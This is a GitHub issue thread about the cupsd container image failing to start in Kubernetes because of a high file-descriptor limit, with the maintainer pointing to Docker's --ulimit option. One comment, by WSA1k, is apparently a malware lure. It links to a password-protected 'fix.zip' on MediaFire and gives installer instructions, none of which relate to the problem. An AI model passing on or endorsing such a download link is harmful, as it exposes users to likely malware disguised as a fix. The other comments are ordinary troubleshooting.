### ISSUE TITLE
[cupsd] Fails to start in kubernetes due to ulimit

### ISSUE THREAD

**Issue by martin31821** [olbat/dockerfiles#108]
Hi,

I'm trying to run your cupsd image in kubernetes and I've discovered that cups crashes when it encounters a too high LIMIT_NOFILE. I'd like to propose to add a small entrypoint script that sets LIMIT_NOFILE for the container to an env variable.

Would you be open to that?

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by olbat** [comment]
That's not how Docker and kernel namespaces work. If you want to tweak the ulimit value for your container, you can do it through the appropriate Docker option ([--ulimit](https://docs.docker.com/engine/containers/resource_constraints/) iirc).

**Comment by olbat** [comment]
You can possibly check this issue: https://github.com/olbat/dockerfiles/issues/105#issuecomment-2067778834
